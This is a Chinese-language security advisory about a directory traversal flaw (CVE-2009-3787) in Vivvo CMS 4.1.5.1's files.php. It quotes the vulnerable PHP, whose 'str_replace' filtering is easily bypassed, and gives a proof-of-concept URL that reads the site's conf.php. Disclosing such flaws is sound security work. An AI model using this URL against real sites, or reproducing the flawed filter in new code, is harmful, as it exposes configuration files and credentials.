Vivvo CMS files.php目录遍历漏洞
发布日期:2009-10-21
更新日期:2009-10-22
受影响系统:Spoonlabs Vivvo CMS 4.1.5.1
描述:
BUGTRAQ ID:
36783
CVE(CAN) ID:
CVE-2009-3787
Vivvo CMS是一款国外的商业内容管理系统,基于Ajax后台管理。
Vivvo CMS的files.php页面没有正确地过滤用户在POST或GET请求中所提交的file参数,远程攻击者可以通过向服务器提交恶意参数请求执行目录遍历攻击,读取任意系统文件。以下是有漏洞代码段:
-----------------------------[source code start]-------------------------------
if (isset($_REQUEST["file"])) {
$filename = str_replace('..', '', $_REQUEST["file"]);
$filename = str_replace('logs/', '', $filename);
$file = VIVVO_FS_ROOT . 'files/' . $filename;
if (file_exists($file) && !is_link($file) && !is_dir($file)){
$file_split = explode('.', $file);
$ext = end ($file_split);
...
header("Content-type: application/force-download");
header("Content-disposition: attachment; filename=\"".basename($file)."\"");
}
readfile($file);
-----------------------------[source code end]---------------------------------
<*来源:Janek Vind (
come2waraxe@yahoo.com)
链接:
http://marc.info/?l=bugtraq&m=125615322117821&w=2
http://secunia.com/advisories/37117/
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://www.example.com/vivvo.4.1.5.1/files.php?file=.logs/./conf.php建议:
厂商补丁:
Spoonlabs
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.spoonlabs.com/浏览次数:4297
严重程度:0(网友投票)